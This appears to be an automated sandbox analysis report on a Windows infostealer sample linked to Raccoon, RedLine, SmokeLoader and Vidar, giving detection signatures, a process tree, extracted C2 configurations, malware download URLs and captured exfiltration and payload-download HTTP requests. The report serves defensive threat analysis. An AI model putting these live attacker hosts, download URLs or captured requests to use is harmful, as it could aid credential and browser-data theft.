Windows Analysis Report Md0q201V1D.exe

Overview

General Information

Sample Name: Md0q201V1D.exe
Analysis ID: 511702
MD5: a0bc297d8eaad37f1b145d108786e993
SHA1: ac6858536f64ec7113f1cd10b248430da8510db8
SHA256: b06b803c1a654849e7b0310b0b590ca574568ab9eba41858e8caaff5dbbeacba
Tags: exe, RaccoonStealer

Detection

Raccoon RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Sample uses process hollowing technique
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
PE file does not import any functions
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Md0q201V1D.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\Md0q201V1D.exe' MD5: A0BC297D8EAAD37F1B145D108786E993)
    • Md0q201V1D.exe (PID: 5724 cmdline: 'C:\Users\user\Desktop\Md0q201V1D.exe' MD5: A0BC297D8EAAD37F1B145D108786E993)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 21.exe (PID: 2132 cmdline: C:\Users\user\AppData\Local\Temp\21.exe MD5: A0BC297D8EAAD37F1B145D108786E993)
          • 21.exe (PID: 808 cmdline: C:\Users\user\AppData\Local\Temp\21.exe MD5: A0BC297D8EAAD37F1B145D108786E993)
        • B096.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\B096.exe MD5: F57B28AEC65D4691202B9524F84CC54A)
          • aspnet_state.exe (PID: 4772 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe MD5: 3269806DC450E24113CF4FE03C3AD197)
            • chrome.exe (PID: 6016 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 6128 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
            • chrome.exe (PID: 1472 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 3732 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
          • ServiceModelReg.exe (PID: 7320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe MD5: FFF587A66B8D5A50A055B9CD6D632BEB)
            • chrome.exe (PID: 8084 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 6240 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
            • chrome.exe (PID: 5744 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 7992 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
        • BBE1.exe (PID: 4756 cmdline: C:\Users\user\AppData\Local\Temp\BBE1.exe MD5: 787AF677D0C317E8062B9705CB64F951)
        • CBF0.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\CBF0.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
        • DF3A.exe (PID: 5464 cmdline: C:\Users\user\AppData\Local\Temp\DF3A.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
          • DF3A.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\DF3A.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
        • EBBE.exe (PID: 1140 cmdline: C:\Users\user\AppData\Local\Temp\EBBE.exe MD5: 539C39A9565CD4B120E5EB121E45C3C2)
        • C066.exe (PID: 5604 cmdline: C:\Users\user\AppData\Local\Temp\C066.exe MD5: F0BE69176E592FA1A6345A7090A9EA30)
  • gbhudtb (PID: 7044 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
    • gbhudtb (PID: 3016 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
  • gbhudtb (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
    • gbhudtb (PID: 3796 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
  • bhhudtb (PID: 8080 cmdline: C:\Users\user\AppData\Roaming\bhhudtb MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}

Threatname: SmokeLoader

{"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\DF3A.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x20735:$x1: https://cdn.discordapp.com/attachments/
• 0x207e9:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\B096.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x7b593:$x1: https://cdn.discordapp.com/attachments/
• 0x7b647:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\DEDC.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x7ae95:$x1: https://cdn.discordapp.com/attachments/
• 0x7af49:$x1: https://cdn.discordapp.com/attachments/
• 0x7affd:$x1: https://cdn.discordapp.com/attachments/
• 0x7b0b1:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\BBE1.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x43bf:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\D8D0.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x4443:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
29.3.CBF0.exe.3080000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
39.0.DF3A.exe.ed0000.11.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x20735:$x1: https://cdn.discordapp.com/attachments/
• 0x207e9:$x1: https://cdn.discordapp.com/attachments/
31.0.DF3A.exe.a40000.3.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x20735:$x1: https://cdn.discordapp.com/attachments/
• 0x207e9:$x1: https://cdn.discordapp.com/attachments/
24.0.B096.exe.a00000.1.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x7b593:$x1: https://cdn.discordapp.com/attachments/
• 0x7b647:$x1: https://cdn.discordapp.com/attachments/
24.2.B096.exe.a00000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
• 0x7b593:$x1: https://cdn.discordapp.com/attachments/
• 0x7b647:$x1: https://cdn.discordapp.com/attachments/

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match | File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe | Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept | Avira URL Cloud: Label: malware
Source: http://xacokuo8.top/ | Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ | Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
Source: 24.2.B096.exe.4446e20.2.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
Multi AV Scanner detection for domain / URL
Source: http://sysaheu90.top/game.exe | Virustotal: Detection: 16%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe | ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\CAC5.exe | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\CD17.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\D8D0.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | ReversingLabs: Detection: 42%
Machine Learning detection for sample
Source: Md0q201V1D.exe | Joe Sandbox ML: detected
Source: 19.0.21.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match | File source: 24.2.B096.exe.653a840.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.B096.exe.653a840.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.B096.exe.5f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.B096.exe.5f90000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
Source: Md0q201V1D.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\C066.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:50078 -> 194.180.174.181:80
Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:50078 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe | Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe | Domain query: znpst.top
Source: C:\Windows\explorer.exe | Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe | Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe | Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe | Domain query: hajezey1.top
Source: C:\Windows\explorer.exe | Domain query: sysaheu90.top
Connects to many ports of the same IP (likely port scanning)
Source: global traffic | TCP traffic: 2.56.214.190 ports 2,5,6,8,9,59628
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://xacokuo8.top/
Source: Malware configuration extractor | URLs: http://hajezey1.top/
Source: global traffic | HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: toptelete.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 194.180.174.181
Source: global traffic | HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic | HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic | HTTP traffic detected: POST /936 HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 65.108.80.190 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV | Content-Length: 2068 | Host: 194.180.174.181
Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.80.190 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /706 HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 65.108.80.190 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 5611 | Host: 65.108.80.190 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 118349 | Host: 65.108.80.190 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 29 Oct 2021 12:09:41 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 | Last-Modified: Fri, 29 Oct 2021 12:09:02 GMT | ETag: "54a00-5cf7cb1650dd7" | Accept-Ranges: bytes | Content-Length: 346624 | Connection: close | Content-Type: application/octet-stream
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 29 Oct 2021 12:10:20 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 | Last-Modified: Fri, 29 Oct 2021 12:10:03 GMT | ETag: "92e00-5cf7cb5008bf2" | Accept-Ranges: bytes | Content-Length: 601600 | Connection: close | Content-Type: application/octet-stream
